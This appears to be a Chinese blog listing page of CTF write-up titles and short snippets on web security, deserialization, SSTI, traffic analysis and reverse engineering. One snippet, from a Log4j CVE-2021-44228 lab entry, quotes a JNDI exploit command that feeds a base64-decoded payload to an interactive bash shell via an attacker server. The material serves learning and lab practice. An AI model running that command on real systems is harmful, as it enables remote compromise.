目录法一、条件竞争(没成功 法二、session反序列化先随便注册个账号登录,然后拿bp抓包改密码(username改成admin 然后admin / 1234567登录康好康的图片功能可以打SSRF,不能直接读本地文件,比...
-
wp 【Web】DASCTF X GFCTF 2024|四月开启第一局 题解(全)
-
ssh 服务器 ctf buuctf Linux Labs 题解
SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他...
-
CTF Node.js之沙盒专题
Node.js一直是薄弱项,今天特意整理一下,基本上是各个大佬写的大杂烩,仅用于学习记录~~~首先介绍一下nodejs中用来执行系统命令的模块child_process。Nodejs通过使用child_process模块...
-
web安全 序列化反序列化 [网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)
文章目录姿势总结姿势提示:有一个良好的备份网站的习惯故使用dirsearch工具扫描目录得到的扫描结果中包含www.zip目录通过url路径下载zip文件:index.php中含有关键代码:Get传参传入一个参数select...
-
前端 android 安全 web安全 CTF bugku-web-聪明的php
传递一个参数,提示flag的文件名随意这里就是要传递参数filename,其值随意直接得到内部逻辑代码这里应该是一个命令指定漏洞 要想办法绕过过滤,让value中的恶意执行代码成功执行 常见的php命令执行函数有 syste...
-
服务器 阿里云 前端 pip CTF靶场搭建及Web赛题制作与终端docker环境部署
写在前面 哈喽大家好!我是Myon,趁着我的云服务器还没过期,这次给大家出一期很详细的CTF比赛的靶场搭建以及关于Web赛题的制作与docker环境的部署教程,由于本人能力有限,也只能给大家讲一些基础简单的东西,欢迎大家在...
-
wp 【Web】NSSCTF Round#20 Basic 两道0解题的赛后谈
目录前言组合拳!前言本想着说看看go的gin框架就睡了的,r3师傅提醒说赛题环境已经上了,那不赶紧研究下主要来谈谈做题的心路历程拿到题目的第一反应应该是:“什么是Codeigniter”,接着自然会去面向搜索引擎解题在那之...
-
RCE PHP 网络安全 web安全 第二届 N1CTF Junior WEB方向 部分题解WP
题目描述:很简单的rce哦启动环境,源码直接给了。allows[7] = "鏉傞奔鉂鏉傞奔鉂";逐行解释:#!/bin/bash:这行指定了脚本执行时使用的解释器,即 Bash。定义了一个名为 reject 的函数,它接...
-
tcp/ip 网络协议 网络 网络安全 渗透测试 CTF 安全 知道IP怎么反查域名?这几个方法一查一个准
知道网络IP怎么反查出真实域名来?给大家分享几个我常用的方法,就算你不懂技术你都能查得出来!一、fofa这是一个白帽黑客非常喜欢用的社工平台,只要你输入IP就能查到很多背后的信息。传送门:https://fofa.info二...
-
CTF PHP反序列化新手入门学习总结
最近写了点反序列化的题,才疏学浅,希望对CTF新手有所帮助,有啥错误还请大师傅们批评指正。php反序列化简单理解首先我们需要理解什么是序列化,什么是反序列化?PHP序列化:serialize( 序列化是将变量或对象转换成字符...
-
web安全 ctf java [~/vulhub]/log4j/CVE-2021-44228-20221225
2.java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,base64编码}|{base64,-d}|{bash,-i}” -A “服...
-
前端 android web安全 N1CTF Junior 2024 Web Official Writeup(Nu1L Team组织的官方纳新赛事,旨在选拔优秀人才加入Nu1L Team,可是小北是大二生,抱着玩玩的心态来的)
Nu1L - CTF大本营 - 网络安全竞赛平台-i春秋 (ichunqiu.com https://www.ichunqiu.com/competition/team/15赛事举办方信息Nu1L Team组织的官方纳新赛事...
-
安全 【Web】CTFSHOW元旦水友赛部分wp
目录 web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp. pearcmd不解释 这里主要是 ,file://协议支持以file://localhost/etc/hosts...
-
ctf pwn 二进制安全虚拟机Protostar靶场(5)堆的简单介绍以及实战 heap0
前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章什么是堆堆是动态内存分配的区域,程序在运行时用来分配内存。它与栈不同,栈用于静态分配内存,并且具有固定的...
-
网络安全 nss round 16 【Web】NSSCTF Round#16 Basic个人wp(全)
出题友好,适合手生复健。目录①RCE但是没有完全RCE②了解过PHP特性吗①RCE但是没有完全RCE上来就是一段md5八股(string 就是不让用数组了,然后强比较需要md5碰撞 之后是要md5前后都是0e成功过掉,访问3...
-
python 开发语言 CTF 前端 javascript 【精选】java初识多态 多态的优势和弊端
博主介绍 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏 == 养成习惯(一...
-
oracle 数据库 wireshark 流量分析 web安全 安全 CTF数据分析题详解
目录 题目一(1.pcap 题目二(2.pcap 题目三(3.pcap 题目四(4.pcap CTF流量分析经典例题详解-CSDN博客 本文章涉及的所有题目附件下载地址: 链接: https://pan.baidu...
-
软件教程 CTF 【软件逆向】如何逆向Unity3D+il2cpp开发的安卓app【IDA Pro+il2CppDumper+DnSpy+AndroidKiller】
教程背景 课程作业要求使用反编译技术,在游戏中实现无碰撞。正常情况下碰撞后角色死亡,修改为直接穿过物体不死亡。 需要准备的软件 一、使用il2CppDumper导出程序集 将{my_game}.apk后缀修改为{my_gam...
-
web安全 汽车安全 CTF 鱼哥赠书活动第⑤期:《ATT&CK视角下的红蓝对抗实战指南》《智能汽车网络安全权威指南》上下册 《构建新型网络形态下的网络空间安全体系》《Kali Linux高级渗透测试》
鱼哥赠书活动第⑤期: 《ATT&CK视角下的红蓝对抗实战指南》1.1介绍: 《智能汽车网络安全权威指南》上册1.1介绍: 《智能汽车网络安全权威指南》下册1.1介绍: 《构建新型网络形态下的网络空间安全体...
-
web安全 php [CTF/网络安全] 攻防世界 Web
...
-
数据库 web安全 网络安全 php 后端 BUUCTF [GXYCTF2019]BabySQli 1 详解!(MD5与SQL之间的碰撞)
题目环境burp抓包 随便输入值 repeater放包 在注释那里发现某种编码 看着像是base编码格式 通过测试发现是套加密(二次加密) 首先使用base32对此编码进行解码 base32解码c2VsZWN0ICog...
-
web安全 黑客 防火墙 (蓝宝书)网络安全——CTF那些事儿
欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关...
-
python 安全 CTF WEB 【心得】基于flask的SSTI个人笔记
目录 计算PIN码 例题1 SSTI的引用链 例题2 SSTI利用条件: 渲染字符串可控,也就说模板的内容可控 我们通过模板 语法 {{ xxx }}相当于变相的执行了服务器上的python代码 利用render_templ...
-
python 安全 ctf htb https://app.hackthebox.com/machines/Squashed
[sudo] kwkl 的密码:[sudo] kwkl 的密码:对不起,请重试。[sudo] kwkl 的密码:正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成...
-
2023工业互联网大赛 Wireshark 流量分析 CTF 溯源报告 2023工业信息安全大赛--决赛溯源分析报告networ.pcapng
什么是wireshark? wireshareknetwor.pcapng数据包数据包下载 请私信博主公众号获取: Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包,...
没有更多内容